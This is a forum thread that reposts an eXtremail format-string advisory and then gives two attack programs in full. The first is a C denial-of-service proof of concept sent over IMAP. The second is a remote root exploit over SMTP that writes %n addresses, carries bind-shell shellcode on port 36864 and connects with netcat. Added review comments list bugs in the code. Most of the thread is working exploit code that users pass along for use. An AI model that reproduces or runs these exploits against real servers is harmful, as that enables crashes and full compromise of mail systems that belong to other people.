qcred11

Package: eXtremail
Auth: http://www.extremail.com/
Version(s): 1.5.9 (current release)
Vulnerability: Format String



What's eXtremail:

eXtremail is a Unix mail server that supports SMTP/POP3/IMAP protocols.
It includes support for virtual domains, spoofing-attack protection, SSL connections
and antivirus checking.



Vulnerability Description:

Format string vulnerabilities exist in the logging routines of eXtremail,
allowing remote attackers to gain root privileges.
This security flaw can be exploited by supplying a specially crafted string
containing format specifiers to various SMTP, POP and IMAP commands.
The vulnerability was previously reported to affect earlier versions
(BugTraq ID: 2908) and has been reintroduced in the latest version of eXtremail.


Here is a snippet of eXtremail's log:

25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> - IMAP - Incoming IMAP connection            -
25/04/2004 - 16:26:29 -> ----------------------------------------------
25/04/2004 - 16:26:29 -> IMAP - IMAP connection: 192.168.0.150
25/04/2004 - 16:26:29 -> IMAP - Error: User %s
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received
25/04/2004 - 16:26:29 -> SIGN - Signal: segmentation fault received



After a successful denial-of-service attack, eXtremail must be restarted
to regain its functionality (Smtpd, Pop3d, Imapd, Remt).






Proof of Concept:

------ eXtremail-kill.c --------


/**********************************************
*  Proof of Concept                          *
*  eXtremail 1.5.x Denial of Service          *
*                                            *
*  Luca Ercoli  <luca.e [at] seeweb.com>      *
*  Seeweb          http://www.seeweb.com      *
*                                            *
***********************************************/

#include <stdio.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>

#define PORT 143
#define MAXRECVSIZE 100


// Prototypes.
int main(int argc, char *argv[]);
void crash(char *host,int TYPE);


// Byte count of the last recv() in crash().  main() resets it and then
// runs the second crash() in a forked child, so the parent's copy is never
// updated by that call (see the note in main()).
int numbytes;



/*
 * Connect to IMAP (PORT, 143) on `host`, read the server banner and, when
 * TYPE == 0, send the format-specifier line `poc`.  Any other TYPE only
 * connects, reads the banner and disconnects; main() uses that as a
 * liveness probe.  Exits the process on resolver/socket/connect/recv
 * failure; the recv() byte count is left in the global `numbytes`.
 *
 * NOTE(review): exit(), memset(), strlen(), sleep() and close() are used
 * without <stdlib.h>, <string.h> or <unistd.h> being included above, so
 * they are implicitly declared (an error on current compilers).
 */
void crash(char *host,int TYPE)
{

int sockfd; 
char buf[MAXRECVSIZE];
struct hostent *he;
struct sockaddr_in their_addr;
/* IMAP LOGIN line whose username field consists of printf conversions.
 * The advisory's log excerpt ("Error: User %s") shows such input reaching
 * the server's logger as a format string.  Defence on the server side:
 * log peer-supplied text only through a fixed format ("%s", buf). */
char poc[]="1 login %s%s%s%s%s%s%s%s%s %s%s%s%s%s%s%s%s%n%n%n\n";


  if ((he=gethostbyname(host)) == NULL)
    { 
      perror("gethostbyname");
      exit(1);
    }

  if ((sockfd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
    {
      perror("socket");
      exit(1);
    }

their_addr.sin_family = AF_INET; 
their_addr.sin_port = htons(PORT); 
their_addr.sin_addr = *((struct in_addr *)he->h_addr);
memset(&(their_addr.sin_zero), '\0', 8);

  if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(struct sockaddr)) == -1)
    {
      perror("connect");
      exit(1);
    }

 
  /* Bounded to MAXRECVSIZE-1 so the terminator below always fits. */
  if ((numbytes=recv(sockfd, buf, MAXRECVSIZE-1, 0)) == -1)
    {
      perror("recv");
      exit(1);
    }

buf[numbytes] = '\0';

  if (TYPE == 0)
    {
      /* Banner is printed through "%s", i.e. not as a format string. */
      printf("[+] Server -> %s",buf);
      sleep(1);
      printf("\n[!] Sending malicious packet...\n");

      /* Return value of send() is not checked; a short or failed send is
       * reported as "Sent!" regardless. */
      send(sockfd,poc, strlen(poc), 0);
      sleep(1);
      printf ("\n[+] Sent!\n");
    }

close(sockfd);

}



/*
 * Entry point: argv[1] is the target host.  Sends the payload once, then
 * probes the server again from a forked child and reports it as crashed
 * when `numbytes` is still 0 after five seconds.
 *
 * NOTE(review): the probe runs in the child, which gets its own copy of
 * `numbytes`; the parent's check below therefore always sees 0 and prints
 * "crashed!" whatever the server's state.  The child, once crash()
 * returns, also falls through to the sleep/check/return below.
 */
int main(int argc, char *argv[])
{
   
printf("\n\n  eXtremail 1.5.x Denial of Service  \n");
printf("by Luca Ercoli <luca.e [at] seeweb.com>\n\n\n\n");


  if (argc != 2)
  {   
    fprintf(stderr,"\nUsage -> %s hostname\n\n",argv[0]);
    exit(1);
  }

crash(argv[1],0);
numbytes=0;
printf ("\n[+] Checking server status ...\n");


/* fork() result is not distinguished beyond child/non-child; a -1
 * (fork failure) is treated like the parent path. */
if(!fork()) crash(argv[1],1);
sleep(5);
if (numbytes == 0) printf ("\n[!] Smtpd/Pop3d/Imapd/Remt crashed!\n\n\n");

return 0;


}

-------------------------------



Solution:
No solution available at the moment.

Psychotec
compiled it for ya....


qcred11
Thanks man.
By the way I got the latest code:


/*  Remote Format Strings Exploit for eXtremail latest versions.  */
/*  ============================================================  */
/*        */
/*              By B-r00t <br00t@blueyonder.co.uk>        */       
/*                                                            */
/* Date:  02/07/2003    */
/* Reference:      http://www.extremail.com/  */
/* Versions:      Linux eXtremail-1.5-8 => VULNERABLE  */
/*  Linux eXtremail-1.5-5 => VULNERABLE  */ 
/*        */
/* Exploit: eXtreme.c      */
/*  Compile: gcc -o eXtreme eXtreme.c    */
/*        */
/* Exploit uses format strings bug in fLog() of smtpd to bind a  */
/* r00tshell to port 36864 on the target eXtremail server.  */
/*        */
/* Methods of exploitation.    */
/* ------------------------    */
/*  eXtremail-1.5-5.i686.rpm use format strings bug to overwrite */
/* GOT of fflush() to point to shellcode.    */
/*        */
/* eXtremail-1.5-8.i586.rpm is a static binary so its not  */
/* possible to abuse GOT. Saved RET address is overwritten  */
/* to point to shellcode.      */
/*        */
/* New Releases with old bugs? => FIX IT!    */
/*        */
/* THIS CODE IS FOR EDUCATIONAL PURPOSES ONLY!  */
/*        */

#include <stdlib.h>
#include <stdio.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <unistd.h>

#define EXPLOIT "eXtreme"   // program name printed in the banner and usage()
#define DEST_PORT 25        // SMTP port that get_sock() connects to

// Prototypes
int get_sock (char *host);
int send_sock (char *stuff);
int read_sock (void);
void usage (void);
int do_it (void);

// Globals
int socketfd, choice;      // connected socket (get_sock); index into targets[] (main)
unsigned long GOT, RET;    // filled from targets[choice] in do_it()
char *myip;                // not referenced anywhere in this listing
char helo[] = "HELO Br00t~R0x~Y3r~W0rld!\n";   // SMTP greeting sent by main()
/* Raw payload bytes as a hex-escaped string; the leading run of 0x90
 * bytes precedes the code proper.  Appended to the request in do_it(). */
char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xeb\x6e\x5e\x29\xc0\x89\x46\x10"
"\x40\x89\xc3\x89\x46\x0c\x40\x89"
"\x46\x08\x8d\x4e\x08\xb0\x66\xcd"
"\x80\x43\xc6\x46\x10\x10\x88\x46"
"\x08\x31\xc0\x31\xd2\x89\x46\x18"
"\xb0\x90\x66\x89\x46\x16\x8d\x4e"
"\x14\x89\x4e\x0c\x8d\x4e\x08\xb0"
"\x66\xcd\x80\x89\x5e\x0c\x43\x43"
"\xb0\x66\xcd\x80\x89\x56\x0c\x89"
"\x56\x10\xb0\x66\x43\xcd\x80\x86"
"\xc3\xb0\x3f\x29\xc9\xcd\x80\xb0"
"\x3f\x41\xcd\x80\xb0\x3f\x41\xcd"
"\x80\x88\x56\x07\x89\x76\x0c\x87"
"\xf3\x8d\x4b\x0c\xb0\x0b\xcd\x80"
"\xe8\x8d\xff\xff\xff\x2f\x62\x69"
"\x6e\x2f\x73\x68";


/* Per-target parameter table, selected by argv[2] in main().  Terminated
 * by the all-zero entry; usage() walks it until systemtype is NULL. */
struct {
        char *systemtype;   /* label printed by usage() and the do_it() summary */
        unsigned long got;  /* copied to the global GOT in do_it() */
        unsigned long ret;  /* copied to the global RET in do_it() */
        int pad;            /* copied to PAD in do_it() */
        int buf;            /* shown as the "max bytes" figure in do_it() */
        int pos;            /* copied to POS in do_it() */
} targets[] = {
// Confirmed targets tested by B-r00t.
        { "RedHat 7.2 eXtremail V1.5 release 5 (eXtremail-1.5-5.i686.rpm)",  0x0813b19c, 0xbefff1e8, 1, 266, 44},
        { "Linux ANY eXtremail V1.5 release 5 (eXtremail-1.5-5.tar.gz)",  0x0813b19c, 0xbefff1b8, 1, 266, 44},
{ "Linux ANY eXtremail V1.5 release 7 (ALL VERSIONS)",  0xbefff0c8, 0xbefff1d4, 1, 266, 44},
        { "eXtremail V1.5 DEBUG",  0x44434241, 0xaaaaaaaa, 1, 266, 44},
        { 0 }
};

/*
 * Entry point: argv[1] is the target address (dotted quad, see get_sock()),
 * argv[2] an index into targets[].  Exports argv[1] as $TARGET for the
 * system() call in do_it(), performs the SMTP greeting exchange and then
 * calls do_it(), which exits the process rather than returning.
 *
 * NOTE(review): the bounds check on `choice` hard-codes 3 instead of
 * deriving it from targets[]; the two must be kept in sync.  argv[1] goes
 * into the environment unvalidated and is later expanded by a shell in
 * do_it(), so any shell metacharacters in it are interpreted there.
 */
int main ( int argc, char *argv[] )
{
char *TARGET = "TARGET";

printf ("\n%s by B-r00t <br00t@blueyonder.co.uk>. © 2003\n", EXPLOIT);

if (argc < 3)
usage ();

choice = atoi(argv[2]);
if (choice < 0 || choice > 3)
usage ();

setenv (TARGET, argv[1], 1);

get_sock(argv[1]);
sleep (1);
read_sock ();
sleep (1);
send_sock (helo);
sleep (1);
read_sock ();
sleep(1);
do_it ();
}


/* Print the usage line and the numbered entries of targets[], then
 * exit(-1).  Never returns. */
void usage (void)
{
        int loop;
printf ("\nUsage: %s [IP_ADDRESS] [TARGET]", EXPLOIT);
        printf ("\nExample: %s 10.0.0.1 2 \n", EXPLOIT);
for (loop = 0; targets[loop].systemtype; loop++)
  printf ("\n%d\t%s", loop, targets[loop].systemtype);
        printf ("\n\nOn success a r00tshell will be spawned on port 36864.\n\n");
exit (-1);
        }


/*
 * Open a TCP connection to host:DEST_PORT and store the descriptor in the
 * global socketfd.  `host` must be a dotted-quad address: inet_aton()
 * does no name resolution.  Exits on socket/parse/connect failure.
 *
 * NOTE(review): declared int but nothing is returned; callers ignore the
 * value, but using it would be undefined.  The perror() strings end in
 * "\n", which lands before the ": <strerror>" text perror() appends.
 */
int get_sock (char *host)
{
struct sockaddr_in dest_addr;

if ((socketfd = socket(AF_INET, SOCK_STREAM, 0)) == -1){
        perror("Socket Error!\n");
        exit (-1);
        }

dest_addr.sin_family = AF_INET;
dest_addr.sin_port = htons(DEST_PORT);
if (! inet_aton(host, &(dest_addr.sin_addr))) {
        perror("inet_aton problems\n");
        exit (-2);
        }

memset( &(dest_addr.sin_zero), '\0', 8);
if (connect (socketfd, (struct sockaddr *)&dest_addr, sizeof (struct sockaddr)) == -1){
        perror("Connect failed!\n");
        close (socketfd);
        exit (-3);
        }
printf ("\n\nConnected to %s\n", host);
}



/* Send the NUL-terminated string `stuff` over socketfd, echo it, and
 * return the byte count.  Exits on a -1 from send(); a short send
 * (bytes < strlen(stuff)) is not detected or retried. */
int send_sock (char *stuff)
{
int bytes;
        bytes = (send (socketfd, stuff, strlen(stuff), 0));
        if (bytes == -1) {
        perror("Send error");
        close (socketfd);
        exit(4);
}
printf ("Send:\t%s", stuff);
return bytes;
}


/*
 * Read up to sizeof(buffer) bytes from socketfd into a zeroed local
 * buffer, echo it with "%s", and return the byte count.
 *
 * NOTE(review): recv() may fill all 200 bytes, leaving no terminator for
 * the printf() below, which would then read past the buffer.  A return of
 * 0 (peer closed) is treated as a successful empty read, and the error
 * text says "send" for what is a recv() failure.
 */
int read_sock (void)
{
        int bytes;
char buffer[200];
char *ptr;
ptr = buffer;
memset (buffer, '\0', sizeof(buffer));
        bytes = (recv (socketfd, ptr, sizeof(buffer), 0));
        if (bytes == -1) {
        perror("send error");
        close (socketfd);
        exit(4);
}
printf ("Recv:\t%s", buffer);
return bytes;
}


/*
 * Build the SMTP "mail from:" request for targets[choice] from the global
 * GOT/RET values, send it over socketfd, then hand off to an nc(1)
 * invocation through system().  Ends with exit(0); never returns.
 *
 * NOTE(review): r, g and w are declared with 3 elements but element 3 is
 * written (r[3], g[3], and the loop over w runs to 4), which is out of
 * bounds.  g is unsigned char[] but is passed to strncat(), which takes
 * char *.  The summary printf()s pair unsigned long with "%x" and size_t
 * with "%d"; both are format/argument mismatches.  The system() command
 * is expanded by a shell using $TARGET, which main() set from argv[1]
 * without validation.
 */
int do_it (void)
{
char format[200], buf[500], *bufptr, *p;
int loop, sofar = 0;
int PAD = targets[choice].pad;
int POS = targets[choice].pos;
unsigned char r[3], g[3], w[3];

// Split RET into its four bytes, least significant first.
RET = targets[choice].ret;
r[0] = (int) (RET & 0x000000ff);
r[1] = (int)((RET & 0x0000ff00) >> 8);
r[2] = (int)((RET & 0x00ff0000) >> 16);
r[3] = (int)((RET & 0xff000000) >> 24);

// Same split for GOT.
GOT = targets[choice].got;
g[0] = (int) (GOT & 0x000000ff);
g[1] = (int)((GOT & 0x0000ff00) >> 8);
g[2] = (int)((GOT & 0x00ff0000) >> 16);
g[3] = (int)((GOT & 0xff000000) >> 24);


// Start buf
bufptr = buf;
bzero (bufptr, sizeof(buf));
// strncpy with length == strlen copies no terminator; the bzero() above
// is what keeps buf a valid string for the strncat() calls that follow.
strncpy (buf, "mail from: ", strlen("mail from: "));
sofar = 19;

// Do padding
for (loop=0; loop<PAD; loop++)
strncat (buf, "a", 1);
sofar = sofar+PAD;

//1st GOT addy
strncat (buf, g, 4);

//2nd GOT addy
// Each step bumps the low byte of g in place before appending it again.
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 3rd GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);

// 4th GOT addy
p = &g[0];
(*p)++;
strncat (buf, g, 4);
sofar = sofar+16;

// Per-byte widths; sofar is an int while w[] is unsigned char, so the
// stored value is the sum reduced modulo 256.
for (loop=0; loop<4; loop++) {
    if (r[loop] > sofar) {
      w[loop] = r[loop]-sofar;
      } else
    if (r[loop] == sofar) {
      w[loop] = 0;
      }else
    if (r[loop] < sofar) {
      w[loop] = (256-sofar)+r[loop];
      }
    sofar = sofar+w[loop];
    }

bufptr = format;
bzero (bufptr, sizeof(format));
// Unbounded sprintf() into format[200]; the arguments are single bytes
// and small ints, so the output stays well under that size.
sprintf (bufptr, "%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n%%.%du%%%d$n", w[0], POS, w[1], POS+1, w[2], POS+2, w[3], POS+3);
strncat (buf, format, sizeof(format));
strncat (buf, shellcode, sizeof(shellcode));

// Summarise
printf ("\nSystem type:\t\t%s", targets[choice].systemtype);
printf ("\nWrite Addy:\t\t0x%x", GOT);
printf ("\nRET (shellcode):\t0x%x", RET);
printf ("\nPAD (alignment):\t%d", PAD);
printf ("\nPayload:\t\t%d / %d max bytes", strlen(buf), targets[choice].buf);
printf ("\nSending it ... \n");
sleep(1);

// Ok lets Wack it!
send_sock (buf);
sleep (1);
close (socketfd);
printf ("\nUsing netcat 'nc' to get the r00tshell on port 36864 ....!!!!!\n\n\n");
sleep(3); // May take time to spawn a shell
// Runs through /bin/sh; ${TARGET} is argv[1] verbatim and unquoted.
system("nc -vv ${TARGET} 36864 || echo 'Sorry Exploit failed!'");
exit (0);
}

/*                                                                                                        */
/*    B-r00t aka B#. 2003. <br00t@blueyonder.co.uk> ©              */
/*      "If You Can't B-r00t Then Just B#."                                              */
/*                                                                                                    */
/*  ENJOY!                                                                            */


